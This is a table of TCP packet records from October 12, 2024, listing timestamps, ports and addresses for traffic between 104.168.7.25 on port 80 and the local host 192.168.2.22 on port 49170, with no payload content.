Oct 12, 2024 16:39:56.990616083 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.990632057 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.990654945 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.990669966 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.990684986 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.990700006 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.990715981 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.990720034 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.990732908 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.990746975 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.990784883 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.990828991 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.991147041 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.991189957 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.991246939 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.991249084 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.991266012 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.991282940 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.991292000 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.991298914 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.991311073 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.991319895 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.991333008 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.991525888 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.991576910 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.991705894 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.991720915 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.991735935 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.991750956 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.991755962 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.991766930 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.991770983 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.991782904 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.991786957 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.991799116 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.991806030 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.991815090 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.991816044 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.991832972 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.991833925 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.991848946 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.991856098 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.991866112 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.991872072 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.991878986 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.991883039 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.991902113 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.991924047 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.991975069 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.992537975 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.992588997 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.992708921 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.992731094 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.992747068 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.992757082 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.992763042 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.992765903 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.992779016 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.992784977 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.992793083 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.992796898 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.992814064 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.992815018 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.992831945 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.992835999 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.992847919 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.992849112 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.992857933 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.992865086 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.992881060 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.992892027 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.992897987 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.992901087 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.992916107 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.992934942 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.992986917 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.993561029 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.993577003 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.993592024 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.993613005 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.993628979 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.047946930 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.047971964 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.047986984 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.048022985 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.048041105 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.079962015 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.079976082 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.080014944 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.080086946 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.080101967 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.080115080 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.080127954 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.080136061 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.080156088 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.080210924 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.080235958 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.080281019 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.080281973 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.080322981 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.080363035 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.080421925 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.080462933 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.080512047 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.080519915 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.080533028 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.080571890 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.080575943 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.080590963 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.080607891 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.080617905 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.080622911 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.080646992 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.080657959 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.080826998 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.080847979 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.080863953 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.080877066 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.080878019 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.080877066 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.080894947 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.080902100 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.080910921 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.080914021 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.080929041 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.080933094 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.080943108 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.080945015 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.080961943 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.080969095 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.080992937 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.080998898 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.081255913 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.081273079 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.081288099 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.081310034 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.081321955 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.081442118 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.081458092 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.081474066 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.081487894 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.081497908 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.081499100 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.081504107 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.081511974 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.081517935 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.081521988 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.081537008 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.081537962 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.081554890 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.081561089 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.081569910 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.081574917 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.081585884 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.081595898 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.081603050 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.081610918 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.081617117 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.081626892 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.081626892 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.081634998 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.081657887 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.081671953 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.081738949 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.082171917 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.082221031 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.082389116 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.082411051 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.082433939 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.082437992 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.082437992 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.082448959 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.082463980 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.082468033 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.082479954 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.082482100 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.082495928 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.082500935 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.082510948 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.082515955 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.082526922 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.082536936 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.082544088 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.082559109 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.082559109 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.082559109 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.082576990 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.082587004 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.082595110 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.082598925 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.082612038 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.082621098 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.082637072 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.082658052 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.084927082 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.084953070 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.084978104 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.084992886 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.085769892 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.085820913 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.085901976 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.085916996 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.085932016 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.085946083 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.085952997 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.085959911 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.085963011 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.085974932 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.085978985 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.085984945 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.085995913 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.085998058 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.086011887 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.086018085 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.086029053 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.086030006 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.086049080 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.086071014 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.086126089 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.137239933 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.137264013 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.137289047 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.137304068 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.137321949 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.137336016 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.137350082 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.137481928 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.137481928 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.137481928 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.137481928 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.169411898 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.169517994 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.169533014 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.169548988 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.169564009 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.169588089 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.169600964 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.169616938 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.169657946 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.169672966 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.169687986 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.169687033 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.169687033 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.169687033 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.169687033 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.169687033 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.169687986 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.169703960 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.169719934 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.169735909 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.169744968 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.169745922 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.169745922 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.169745922 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.169750929 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.169780970 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.169780970 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.169802904 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.169837952 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.169853926 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.169867992 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.169872046 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.169902086 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.169914961 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.169914961 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.169914961 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.169914961 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.169917107 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.169954062 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.169954062 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.169977903 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.169994116 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170008898 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170031071 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170042992 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.170042992 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.170047045 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170062065 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.170063019 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170079947 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170085907 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.170094967 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170104980 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.170110941 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170119047 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.170126915 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170137882 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.170147896 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.170166969 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.170221090 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.170320034 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170335054 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170348883 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170362949 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170372963 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.170380116 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.170389891 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170399904 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.170404911 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170422077 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170447111 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170447111 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.170458078 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.170470953 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170486927 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170495987 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.170501947 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170511007 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.170520067 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170530081 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.170535088 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170545101 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.170550108 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170559883 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.170566082 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170574903 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.170581102 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.170583010 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170599937 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170602083 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.170615911 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170618057 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.170634985 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170639992 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.170649052 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.170665026 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.170677900 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.170922995 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170945883 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170962095 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170975924 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.170977116 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170975924 CEST	49170	80	192.168.2.22	104.168.7.25
